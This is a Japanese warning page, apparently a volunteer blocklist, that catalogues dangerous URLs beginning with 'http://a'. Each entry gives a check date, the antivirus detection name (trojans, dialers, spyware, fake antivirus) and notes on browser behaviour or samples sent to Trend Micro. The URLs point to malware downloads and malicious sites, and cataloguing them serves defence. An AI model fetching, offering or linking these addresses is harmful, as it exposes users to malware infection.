Kiken URL List
http:// a から始まるURL

このページは危険と思われるURLでhttp:// a から始まるURLを掲載しています。
他のサイトからこのページに来られた方は最初に Kiken URL List のトップページ をよく読んでください。


Kiken URL List の見方

通し番号.URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説
  ← このようになっています。

  1. http://a.baidu-6661.com/newadsadsxk/newads01.exe
    [2009/03/11]ウィルス名:TSPY_ONLINEG.IJQ


  2. http://a.baidu-6661.com/newadsadsxk/newads02.exe
    [2009/03/11]ウィルス名:TSPY_ONLINEG.IJY


  3. http://a.baidu-6661.com/newadsadsxk/newads03.exe
    [2009/03/11]ウィルス名:POSSIBLE_OLGM-23


  4. http://a.baidu-6661.com/newadsadsxk/newads04.exe
  5. http://a.baidu-6661.com/newadsadsxk/newads05.exe
  6. http://a.baidu-6661.com/newadsadsxk/newads06.exe
  7. http://a.baidu-6661.com/newadsadsxk/newads07.exe
  8. http://a.baidu-6661.com/newadsadsxk/newads08.exe
  9. http://a.baidu-6661.com/newadsadsxk/newads09.exe
  10. http://a.baidu-6661.com/newadsadsxk/newads10.exe
    [2009/01/27]ウィルス名:PAK_GENERIC.001


  11. http://a.rn11.com/yh/pu/yhgeointpu2.htm
    [2003/11/14]system updateを装ったスパイウェア。
    [2005/01/17]外しにくいツールバーが降ってくる。


  12. http://a-commando.info/333/1.jpg
  13. http://a-commando.info/333/index.php
    [2007/05/03]ウィルス名:EXPL_ANICMOO.GEN


  14. http://a-commando.info/zupastik.exe
    [2007/05/03]ウィルス名:TSPY_BZUB.A


  15. http://a-dog.freecities.com/index6.html
    [2008/11/07]以下の @ のURLに飛び、インチキセキュリティサイトを表示する。
    また、以下の A のファイルをDLしろ、と催促してくる。
    @、//antivir-scan-av-free.net/1/?id=21151
    A、//fav-download-software-base.net/antivirus.v.1.0.21151.exe


  16. http://a-search.biz/?wmid=1010
    [2004/09/26]//314zdec.biz/sextracker.html を呼ぶ。


  17. http://a001.cn3721.org/a001.exe
  18. http://a001.cn3721.org/a002.exe
  19. http://a001.cn3721.org/a003.exe
  20. http://a001.cn3721.org/a004.exe
  21. http://a001.cn3721.org/kill.exe
  22. http://a002.cn3721.org/a001.exe
  23. http://a002.cn3721.org/a002.exe
  24. http://a002.cn3721.org/a003.exe
  25. http://a002.cn3721.org/a004.exe
  26. http://a002.cn3721.org/kill.exe
  27. http://a003.cn3721.org/a001.exe
  28. http://a003.cn3721.org/a002.exe
  29. http://a003.cn3721.org/a003.exe
  30. http://a003.cn3721.org/a004.exe
  31. http://a003.cn3721.org/kill.exe
    [2008/03/22]ウィルス名:TROJ_ALMANAHE.AC


  32. http://a7p7.com/pill/loader.exe
    [2007/05/03]ウィルス名:TROJ_DLOADER.ALL


  33. http://a7p7.com/pill/U5nY0gk.jar
    [2007/05/03]ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC


  34. http://a94.g.akamai.net/7/94/1622/2/www.ezula.com/TopText/ezStub.cab
    [2006/01/25]ウィルス名:ADW_EZULA.A


  35. http://aa4a.com/bushbaby/
  36. http://aa4a.com/bushbaby/a.html
  37. http://aa4a.com/bushbaby/qa.html
    [2005/01/21]3つともウィルス名:VBS_REDLOF.A-11


  38. http://aa4a.com/himajinn13sei/index2.html
    [2004/10/27]mailtoストーム。


  39. http://aa4a.com/hirata2/okkun.jpg
    [2004/08/14]mailtoストーム。//www.raus.de/crashme/ に飛ぶ。
    [2005/12/08]再確認。ウィルス名:HTML_SUAR.A+mailtoストーム。環境により、FDDアタックも起きるらしい。


  40. http://aa4a.com/kkkkkk/
    [2004/09/27]「DARK LOLITAS」系というウィルス+スパイウェア満載のサイト。
    詳細はKiken URL List各ページの以下のURL解説を参照。
    //213.159.117.133/dl/ms.php
    //pizdato.biz/acc59/counter.htm
    //x.full-tgp.net/?ms.com 
    [2006/05/27]再確認。「ページを表示できません」となる。


  41. http://aaaa_muzie.at.infoseek.co.jp/crash.html
    [2004/09/26]無限JavaScript。
    [2006/01/05]再確認。無限ウィンドウオープン。「about:blank」のウィンドウが開き続ける。親元のタスクを強制終了で脱出可。


  42. http://abakos.com.es/video.exe
    [2008/10/19]ウィルス名:TROJ_NUWAR.AAU


  43. http://abc.chu.jp/htdocs/saga/
    [2006/10/21]以前はTELNETストームだったが、現在は404である。


  44. http://aberturaslif.com.ar/pornotube/video54582.exe
  45. http://aberturaslif.com.ar/pornotube/video76566.exe
  46. http://aberturaslif.com.ar/pornotube/video1439654.exe
  47. http://aberturaslif.com.ar/pornotube/video8657786.exe
    [2008/12/11]ウィルス名:TROJ_AGENT.AHCI


  48. http://absolutepics.net/
    [2005/02/02]ウィルス名:JAVA_BYTEVER.A 。閉じると全画面表示が複数開き、それを閉じると別サイトの全画面表示など。
    [2005/04/20]改めて確認。ウィルス名:JAVA_BYTEVER.A 。サムネイル形式のアダルトサイトだが、リンク先でもウィルスを検出。
    [2006/09/10]再確認。ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
    海外アダルトサイトで、これ を表示し、閉じるとIEがフリーズする。
    また、これ も8枚表示したりする。その他にも様々な挙動がある。
    [2006/09/10]他の方の結果は以下。
    「謎のアラートが表示される海外アダルトサイトに逝きました。
    閉じると大窓が開かれ、IEがCPU使用率高のままフリーズ。
    プロセスから脱出後もう一度踏んでみるとアラート後に開かれるページはJAVAを起動後にウイルス反応あり。
    Trojan-Downloader.Win32.Agent.acd 、Constructor.Perl.Msdds.b 、Exploit.JS.CVE-2005-1790.f 、Trojan-Downloader.Win32.Ani.c を Kaspersky で検出。」


  49. http://acacbo.tripod.com/
    [2004/09/26]無限JavaScript。


  50. http://acces.blonde.com/package/PackageHtmlCab.CAB
    [2006/09/17]ウィルス名:DIAL_RAS.AM


  51. http://acces-direct.net/10046
  52. http://acces-direct.net/12449
  53. http://acces-direct.net/12955
    [2008/10/19]exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。


  54. http://acces-direct.net/12955/VideoSexe.exe
    [2008/10/19]ウィルス名:DIAL_SAPIR.A


  55. http://acces-direct.net/12995
  56. http://acces-direct.net/15671
    [2008/10/19]exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。


  57. http://acces-direct.net/15671/Choc-fetish.exe
    [2008/10/19]ウィルス名:DIAL_SAPIR.A


  58. http://acces-direct.net/16308
    [2008/10/19]exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。


  59. http://acces-direct.net/17165/Assa.exe
  60. http://acces-direct.net/17165/webcam.exe
    [2008/10/19]ウィルス名:DIAL_SAPIR.A


  61. http://acces-direct.net/17200
  62. http://acces-direct.net/20222
    [2008/10/19]exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。


  63. http://acces-direct.net/20222/adh1_sexarea.exe
    [2006/10/30]2006/10/16 にトレンドマイクロ社にファイルを提出。
    2006/10/20 にその結果の連絡があり、ウィルス名:DIAL_AYKE.B として検出するよう対応、とのこと。
    実際に 2006/10/16 にDLしたファイルからウィルス名:DIAL_AYKE.B を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_AYKE.B を検出することを確認。


  64. http://acces-direct.net/20222/Italie
    [2008/10/19]exeファイルが落ちてくる。ファイルサイズ:96.0KB 。しかし、ウィルス名:DIAL_SAPIR.A を検出。


  65. http://acceso.masminutos.com/
    [2008/10/19]こんな感じ のページ。少し経つと これ を表示する。
    「OK」を選ぶと、再び これ を表示。「キャンセル」を選ぶとウィルス名:TROJ_GENERIC を検出して以下のURLに飛び、真っ白なページを表示する。
    //acceso.masminutos.com/Showdoc.asp?IdFile=


  66. http://acceso.masminutos.com/aplicacion.cab
    [2006/07/08]ウィルス名:TROJ_PERFILER.B


  67. http://acceso.masminutos.com/downloads.cab
    [2006/07/08]ウィルス名:TROJ_Generic


  68. http://acceso.masminutos.com/laaplicacion.cab
    [2006/07/08]ウィルス名:TROJ_PERFILER.B


  69. http://acceso.masminutos.com/software.cab
    [2006/07/08]ウィルス名:TROJ_Generic


  70. http://access.funstore.nl/sexextra.exe
    [2006/10/22]ウィルス名:DIAL_PORNDIAL.MG


  71. http://access.funstore.nl/sexextra%20oud.exe
    [2007/03/21]2006/10/22 にトレンドマイクロ社にファイルを提出。
    2006/10/31 にその結果の連絡があり、ウィルス名:TROJ_Generic として検出するよう対応、とのこと。
    実際に 2006/10/22 にDLしたファイルと今日改めてDLしたファイルからウィルス名:TROJ_Generic を検出することを確認。
    2006/10/22 から今日まではファイルの置き換えは行われていないと推測される。


  72. http://access.funstore.nl/sexextragay.exe
    [2006/10/31]2006/10/22 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_SEXDIALER.A として検出するよう対応、とのこと。
    実際に 2006/10/22 にDLしたファイルからウィルス名:DIAL_SEXDIALER.A を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_SEXDIALER.A を検出することを確認。


  73. http://access.gamezdump.com/output/060560/uk/fullgames/fullgames.exe
    [2006/09/01]2006/08/26 にトレンドマイクロ社にファイルを提出。
    2006/08/31 にその結果の連絡があり、ウィルス名:DIAL_PORNDIAL.MD として検出するよう対応、とのこと。
    2006/08/26 にDLしたファイルからウィルス名:DIAL_PORNDIAL.MD を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_PORNDIAL.MD を検出することを確認。


  74. http://access.gamezdump.com/output/100067/uk/fullgames/Xfullgames.exe
    [2007/02/01]ウィルス名:DIAL_EZDIAL.C


  75. http://accessplugin.com/
    [2005/08/07]スパイウェアサイトと思われるサイト。
    直打ちで行くと飛んでまず この画面 を表示。
    このウィンドウ画面を閉じて再びIEを開き、直打ちで行くと再び飛んで この画面 を表示。
    ところが、このウィンドウ画面のアドレス欄に「 http://accessplugin.com/ 」と再び打ち込んでいくと今度は別のアドレスに飛び、 この画面 を表示。
    そして、 これ を表示。拒否すると これ を表示。「OK」を押すともう1回 これこれ を繰り返す。
    そして、3回目の これ を表示。それを拒否すると今度は これ を表示。「OK」を押すと「Xfullgames.exe」なるアプリケーションをDLしろ、と催促してくる。DLしてみると、バスター無反応だが、以下のアンチウィルスソフトで反応。中身はダイヤラーである。
    AntiVir → DIAL/Generic dialer
    Avast → Win32:Dialer-410
    ClamAV → Dialer-300
    Dr.Web → not a virus Dialer.Premium
    Kaspersky Anti-Virus → Trojan.Win32.Dialer.jr
    NOD32 → a variant of Win32/Dialer


  76. http://accessvid.net/download/accessvid1182.exe
    [2007/05/03]ウィルス名:TROJ_ZLOB.CHK


  77. http://accidentlegalhelp.com/video_1.exe
    [2008/08/29]ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FW


  78. http://acerentalcarindenverco.blog.com/
    [2008/11/22]偽装ウィルス駆除ソフトのページに飛ぶ。


  79. http://achdepannexpress.com/news_usama_video.exe
    [2008/12/20]ウィルス名:TROJ_ZLOB.EXF


  80. http://acompanhates.xpg.com.br/cartao.rar
    [2007/01/11]2006/12/30 にトレンドマイクロ社に中身の「cartao.scr」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_BANLOAD.CAX として検出するよう対応、とのこと。
    実際に 2006/12/30 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.CAX を検出することを確認。
    2006/12/30 から今日までのファイルの置き換えは無いと推測される。


  81. http://acq.thecoupondiscount.com/run.exe
    [2009/03/15]ファイルサイズ:405 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応する。


  82. http://actiolegis.com.ar/stream.exe
    [2008/10/04]ウィルス名:TROJ_FAKEAV.FP


  83. http://actionsex.2dporn.net/
    [2005/11/03]踏むと最初は4〜5枚程度の海外アダルトサイトが開く。放っておくと次々と色々なアダルトサイトが開いていき、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.A を検出するサイトもある。
    [2006/04/14]再確認。こんな感じ のサイト。怪しい挙動は確認出来なかった。


  84. http://activedating.net/
    [2006/09/03]こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
    また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。
    「cyber.wmf」は以下のURLから来ている。
    //cyber-search.biz/cyber.wmf
    元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。


  85. http://actual-porn.super-crazy.net/xxx/xxx-toolbar.html
    [2005/03/31]踏むと上半分がロシア系アダルトサイト、下半分が中国系アダルトサイト、という妙なページ構成になっている。
    このページ自体は無害。このページを閉じると以下の2つのどちらかが新窓で開く。
    1、//www.maturesparadise.net/ ← ウィルス名:JS_MHTREDIR.F+JAVA_BYTEVER.A+JAVA_BYTEVER.C
    2、//elite.super-puper.com/ajax/ajax.php ← 何もなし。


  86. http://acxd.freeload.cc/ieloader.cab
    [2006/07/09]ウィルス名:TROJ_LADDER.B


  87. http://acxd.freeload.cc/iereg.cab
    [2006/07/09]ウィルス名:TROJ_LADDER.D


  88. http://ad.jp.doubleclick.net/702204/11063195.html
    [2005/09/19]踏むと真っ白なページ。SPYBOT反応:DoubleClick 。スパイウェア系のクッキーらしい。
    htmlでは無く、実際は 43Bytes の縦1px、横1pxの image/gif である。


  89. http://ad.laoqn.com/ad.exe
  90. http://ad.laoqn.com/ck.exe
    [2008/07/10]ウィルス名:PAK_Generic.006


  91. http://ad.ote2008.info/ad.css
    [2008/11/27]ウィルス名:TROJ_DLOADE.CUA


  92. http://ad.uu500.com/3d226f621b4a032c.exe
    [2008/10/19]ウィルス名:BKDR_POPWIN.FV


  93. http://ad.yieldx.com/click,9BIAAEauAAA5EAEAbF0AAAAABAAAAP8AAP8DAQAAAQMi0QAA8bMAAFmTAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB5LhEQAAAAA,,http://http.edge.vru4.com/smartserve/click?placement=bn-errorsafe-120x600&aid=ic_ban120&lid=20
    [2006/06/12]踏むと「ErrorSafe」というインチキスパイウェア駆除ソフトをインストールしろ、と言ってくる。


  94. http://adauth.starband.net/alien.exe_
    [2007/02/09]このファイルは「 exe_ 」なので注意。2007/02/01 にトレンドマイクロ社にファイルを提出。
    2007/02/06 にその結果の連絡があり、ウィルス名:TSPY_BANKER.GIE として検出するよう対応、とのこと。
    実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_BANKER.GIE を検出することを確認。
    2007/02/01 から今日まではファイルは置き換えられていないと推測される。


  95. http://adauth.starband.net/Loader_It_Appears_Baischs_Server_Got_Hacked.exe_
    [2007/02/09]このファイルは「 exe_ 」なので注意。2007/02/01 にトレンドマイクロ社にファイルを提出。
    2007/02/06 にその結果の連絡があり、ウィルス名:TROJ_BANLOAD.BPK として検出するよう対応、とのこと。
    実際に 2007/02/01 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_BANLOAD.BPK を検出することを確認。
    2007/02/01 から今日まではファイルは置き換えられていないと推測される。


  96. http://adblock.linkz.com/APHelper.dll#Version=1,0,0,6
    [2005/12/10]ウィルス名:SPYW_ADBLOCK.A 。実行するとレジストリの変更を余儀なくされる。


  97. http://adblock.linkz.com/Download.php?ref=
    [2005/12/10]踏むと こんな感じ だが、いきなりバスターが反応。ウィルス名:SPYW_ADBLOCK.Aを検出する。
    そして、その後すぐに //adblock.linkz.com/Error.htm に飛び、こんな感じ になる。


  98. http://adblock.linkz.com/Home.php
    [2005/12/10]こんな感じ のスパイウェア配布サイト。このページ表示まで無害で、普通に閉じれる。
    しかし、画面の上と中央にある「Install AdBlock Now For FREE」のどちらかをクリックすると、以下の 1. のURLに飛び、ウィルス名:SPYW_ADBLOCK.Aを検出。そして検出後、すぐに 2. に飛ぶ。
    1. では、3. の/APHelper.dll#Version=1,0,0,6をいきなりDLしようとする。
    1. //adblock.linkz.com/Download.php?ref= ← キャプ画像
    2. //adblock.linkz.com/Error.htm ← こんな感じ
    3. //adblock.linkz.com/APHelper.dll#Version=1,0,0,6 ← ウィルス名:SPYW_ADBLOCK.A


  99. http://adgate.info/zscript/dra.chm
    [2006/08/20]ウィルス名:CHM_ADLOAD.HJ


  100. http://adgate.info/zscript/mca.chm
    [2006/09/07]2006/08/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DH として検出するよう対応、とのこと。
    2006/08/20 にDLしたファイルからウィルス名:CHM_CODEBASE.DH を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DH を検出することを確認。


  101. http://adgate.info/zscript/mma.chm
    [2006/08/20]ウィルス名:CHM_SNIPLOAD.A


  102. http://adgate.info/zscript/pre.chm
    [2006/10/31]2006/10/23 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DI として検出するよう対応、とのこと。
    実際に 2006/10/23 にDLしたファイルからウィルス名:CHM_CODEBASE.DI を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DI を検出することを確認。


  103. http://adgate.info/zscript/winfix.chm
    [2006/08/20]ウィルス名:CHM_SYSDOC.B


  104. http://adgate.info/zscript/yea.chm
    [2006/08/20]ウィルス名:CHM_MEDTICKS.V


  105. http://adpeplic.alias.domicile.fr/my_fotos.exe
    [2008/07/05]ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.M


  106. http://ads.adslooks.info/ads.c
    [2008/07/05]不明なファイルが落ちてくる。812バイト。バスターが拒否。
    恐らく、以下のファイルに関係するものと思われる。
    //ads.adslooks.info/ads/ads.exe


  107. http://ads.adslooks.info/ads/ads.exe
    [2008/07/05]ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AJHU


  108. http://ads.adslooks.info/ads/ads.jpg.exe
    [2008/07/05]2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AJHU


  109. http://ads.adslooks.info/ads/web.exe
    [2008/07/05]ウィルス名:TSC_GENCLEAN+TROJ_ALMANAHE.AC


  110. http://ads.dealhelper.com/dealhelper/src/version.exe
    [2005/04/04]バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
    AntiVir → TR/Dldr.Agent.hw2.B
    ClamAV → Adware.Dealhelper


  111. http://ads.dealhelper.com/updates/dhcjb.htm
    [2005/03/12]ウィルス名:JS_NOCLOSE.RY


  112. http://ads.dropspam.com/landingsp2/aaa/upgrade.exe
    [2006/01/15]このexeのアイコンは真っ白で、全く見えないので注意。
    バスター無反応だが、以下のアンチウィルスソフトで反応。
    Dr.Web → Trojan.DownLoader.4980
    NOD32 → probably unknown NewHeur_PE
    Norman Virus Control → Sandbox: W32/Downloader


  113. http://ads.dropspam.com/landingsp2/aab/upgrade.exe
    [2007/03/13]ウィルス名:ADWARE_DROPSPAM


  114. http://ads.dropspam.com/landingsp2/aab/upgrade.exe.aab
    [2007/04/03]2007/03/13 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:Adware_DropSpam として検出するよう対応、とのこと。
    実際に 2007/03/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:Adware_DropSpam を検出することを確認。
    2007/03/13 から今日までのファイルの置き換えは無いと推測される。


  115. http://ads.dropspam.com/landingsp2/aab/upgrade.exe.old
    [2007/03/13]ウィルス名:ADWARE_DROPSPAM


  116. http://ads.dropspam.com/landingsp2/aab/upgrade.exe.new.aab
    [2007/04/03]2007/03/13 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:Adware_DropSpam として検出するよう対応、とのこと。
    実際に 2007/03/13 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:Adware_DropSpam を検出することを確認。
    2007/03/13 から今日までのファイルの置き換えは無いと推測される。


  117. http://ads.opernuz.com/up/hdda.4.exe
    [2007/03/13]ウィルス名:TROJ_HORST.HH


  118. http://ads.opernuz.com/up/injs.a2.exe
    [2007/03/13]ウィルス名:TROJ_HORST.HG


  119. http://ads.opernuz.com/up/setup.exe
    [2007/03/13]ウィルス名:TROJ_HORST.HF


  120. http://ads.z-quest.com/ax/83122.exe
    [2008/07/06]ウィルス名:TSC_GENCLEAN+TROJ_SMALL.CZD


  121. http://ads.z-quest.com/ax/acdt-pid73.exe
    [2008/07/11]2008/07/09 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_DLOAD.BA として検出するよう対応、とのこと。
    実際に 2008/07/09 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TROJ_DLOAD.BA を検出することを確認。
    2008/07/09 から今日までのファイルの置き換えは無いと推測される。


  122. http://ads.z-quest.com/ax/tk58.exe
    [2008/07/06]ウィルス名:ADW_ZQUEST.AH


  123. http://ads.z-quest.com/ax/TTC-4444.exe
    [2008/07/06]ウィルス名:ADW_ADSPY.CE


  124. http://ads1.revenue.net/c?O_SITE_ID=13827&O_CREATIVE_ID=210378&O_RANK=2&
    [2005/08/09]踏むと下のURLに飛ぶ。下のURLのキャプ画像は これ
    //adv1.eblocs.com/spyblocs/adv/evenu_006.html
    スパイウェア駆除ソフト関連のページだが、このソフトは「スパイウェア駆除ソフトを装ったスパイウェア」である。


  125. http://adserver.sextracker.com/click.cgi/www.sextracker.com/Hetero/@Middle
    [2004/12/28]spybot反応:SexTracker 。ページ自体は表示されない。


  126. http://adsextend.net/zscript/ema.chm
    [2006/08/20]ウィルス名:CHM_MEDMOTOR.B


  127. http://adsextend.net/zscript/mca.chm
    [2006/09/07]バスター無反応だが、他社製アンチウィルスソフトで反応する。 2006/08/20 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、このファイルは「破損ファイル」とのこと。


  128. http://adsextend.net/zscript/mma.chm
    [2006/08/20]ウィルス名:CHM_SNIPLOAD.A


  129. http://adsextend.net/zscript/pre.chm
    [2006/10/31]2006/10/23 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:CHM_CODEBASE.DI として検出するよう対応、とのこと。
    実際に 2006/10/23 にDLしたファイルからウィルス名:CHM_CODEBASE.DI を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:CHM_CODEBASE.DI を検出することを確認。


  130. http://adsextend.net/zscript/winfix.chm
    [2006/10/24]ウィルス名:CHM_SYSDOC.B


  131. http://adsextend.net/zscript/yea.chm
    [2006/10/24]ウィルス名:CHM_MEDTICKS.V


  132. http://adshooter.com/pop_shooter/uninstall/ads_unin.exe
    [2007/03/13]ウィルス名:ADWARE_EZULA


  133. http://adtraffic.net/dl.html
    [2005/12/09]スパイウェアサイトと思われるサイト。こんな感じ のサイトだが、ダイアログを表示して、何かをインストールするよう催促される。拒否すると こんな感じ になる。
    何かをインストール、の「何か」とは //www.adtraffic.net/pr/at_homepage.cab と思われる。
    そのcabファイルをDL+解凍すると「EEStartup.exe」なるものが現れるが、Dr.Webで Trojan.DownLoader.5535, BACKDOOR.Trojan を検出。
    詳細は こちら を参照。


  134. http://adult.l-mint.com/modules/weblinks/visit.php?lid=57
    [2005/08/15]軽いブラクラの一種と思われる。このURLを踏むと真っ白なページなのだが、自動でリロードを延々と繰り返す。ウィンドウを閉じれば終了する。


  135. http://adult-incest.com/
    [2006/09/03]こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
    また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。
    「cyber.wmf」は以下のURLから来ている。
    //cyber-search.biz/cyber.wmf
    元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。


  136. http://adult-traffic.org/advert/console.php?id=0hYfJd
  137. http://adult-traffic.org/advert/console.php?id=75RYmf
    [2004/12/04]ウィルス名:JAVA_BYTEVER.A。多くの別窓表示。全画面表示もあり。


  138. http://adult-traffic.org/test/advert/console.php?adv=zRYlQI
    [2004/05/29]何かのソフトをDLさせてこようとするブラクラ。キャンセルを押すと一時アラートオープン。
    [2004/05/30]スパイウェアの可能性。スタートページを書き換えられる。
    [2004/06/07]ウィルス名:Trojan.ByteVerify
    IEで踏むとウィルスセキュリティ警告が出てツールバーをインストールしようとする。
    IEのスタートページをエロサイトにするかの選択画面が出てくる。しかも全画面表示になる。


  139. http://adultdreamhost.com/user/69girls/10musume/haruka_24/
  140. http://adultdreamhost.com/user/69girls/10musume/minami2_21/
  141. http://adultdreamhost.com/user/69girls/1pondo/maya/
  142. http://adultdreamhost.com/user/69girls/asian-hot/nana_misawa/
  143. http://adultdreamhost.com/user/69girls/caribbeancom/hotaru_akane3/
  144. http://adultdreamhost.com/user/69girls/jp-express/nao_kirishima11/
  145. http://adultdreamhost.com/user/69girls/jpnanpa/yuu_izawa3/
  146. http://adultdreamhost.com/user/69girls/mesubuta/juri_endou/
  147. http://adultdreamhost.com/user/hotgirls/asian-hot/hiroko_kurihara3/
  148. http://adultdreamhost.com/user/hotgirls/asian-hot/sakura_kawai3/
  149. http://adultdreamhost.com/user/hotgirls/girlsplanet/yoshimi_kitashiro/
  150. http://adultdreamhost.com/user/japgirls/tokyo-hot/shizuka_tachibana/
  151. http://adultdreamhost.com/user/morogirls/10musume/aya19_tokyo/
  152. http://adultdreamhost.com/user/morogirls/10musume/hina_fukuoka/
  153. http://adultdreamhost.com/user/morogirls/10musume/wakana/
  154. http://adultdreamhost.com/user/morogirls/pacopacomama/ayaka/
  155. http://adultdreamhost.com/user/morogirls/pacopacomama/kurumi/
  156. http://adultdreamhost.com/user/morogirls/pacopacomama/misa_tachibana/
  157. http://adultdreamhost.com/user/moromax/1000giri/namie/
  158. http://adultdreamhost.com/user/moromax/1000giri/rina_20/
  159. http://adultdreamhost.com/user/moromax/jp-express/maya_2/
  160. http://adultdreamhost.com/user/moromax/jp-express/sanae_takahashi3/
  161. http://adultdreamhost.com/user/moromax/jpnanpa/aki_nakamura5/
    [2009/04/29]アダルトサイトのようだが、ウィルス名:HTML_IFRAME.HT を検出。


  162. http://adultexport.net/ferbe/1829823463/1/?id=1005
    [2007/01/09]海外アダルトサイト。動画をDLしようとすると、exeファイルを落としてくる。
    exeファイルのURLは以下である。このファイルはトレンドマイクロ社に調査依頼中である。
    //movies-codecs.com/download/movies-codecs1005.exe


  163. http://adultsexkey.com/two.html
    [2007/03/24]何かの動画が再生できるようであるが、その前に以下のファイルをDLしろ、と言ってくる。
    //codecfeature.com/download/codecfeature1211.exe ← ウィルス名:TROJ_ZLOB.CVK


  164. http://adultweb.2dporn.net/
    [2005/11/03]踏むと最初は4〜5枚程度の海外アダルトサイトが開く。放っておくと次々と色々なアダルトサイトが開いていき、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.Aを検出するサイトもある。


  165. http://advnt01.com/dialer/belgio.CAB
    [2006/08/01]2006/07/21 にDL+解凍して現れた「belgio.ocx」ファイルをトレンドマイクロ社に提出。
    2006/07/26 に返事があり、それは以下。
    「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AD として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」
    2006/07/26 の時点ではバスター無反応であった。
    しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AD を検出することを確認。


  166. http://advnt01.com/dialer/belgio_ver2.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  167. http://advnt01.com/dialer/belgio_ver3.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  168. http://advnt01.com/dialer/canada_ver3.CAB
    [2006/07/08]ウィルス名:TROJ_ADPOWER.C


  169. http://advnt01.com/dialer/canada_ver4.CAB
    [2006/07/08]ウィルス名:TROJ_Generic


  170. http://advnt01.com/dialer/int_ver30.CAB
    [2006/07/20]ウィルス名:DIAL_ADPOWER.T


  171. http://advnt01.com/dialer/int_ver32b.CAB
    [2006/08/01]2006/07/21 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
    2006/07/26 に返事があり、それは以下。
    「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」
    2006/07/26 の時点ではバスター無反応であった。
    しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。


  172. http://advnt01.com/dialer/int_ver32n.CAB
    [2006/08/02]2006/07/22 にDL+解凍して現れた「int_ver32b.ocx」ファイルをトレンドマイクロ社に提出。
    2006/07/26 に返事があり、それは以下。
    「弊社では現在のパターンファイル以降にて、ウイルス名:DIAL_ADPOWER.AE として検出するよう対応する予定となりますので、アップデートをお待ちくださいますようお願いいたします。」
    2006/07/26 の時点ではバスター無反応であった。
    しかし、今日、改めてファイルをDLしてみると、ウィルス名:DIAL_ADPOWER.AE を検出することを確認。


  173. http://advnt01.com/dialer/int_ver34.CAB
    [2006/07/20]ウィルス名:DIAL_ADPOWER.T


  174. http://advnt01.com/dialer/internazionale_ver3.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.B


  175. http://advnt01.com/dialer/internazionale_ver4.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.A


  176. http://advnt01.com/dialer/internazionale_ver5.CAB
    [2006/07/08]ウィルス名:DIAL_ADPOWER.I


  177. http://advnt01.com/dialer/internazionale_ver10.CAB
    [2006/07/08]ウィルス名:TROJ_CLICKER.AF


  178. http://advnt01.com/dialer/internazionale_ver11.CAB
    [2006/07/08]ウィルス名:TROJ_ADPOWER.D


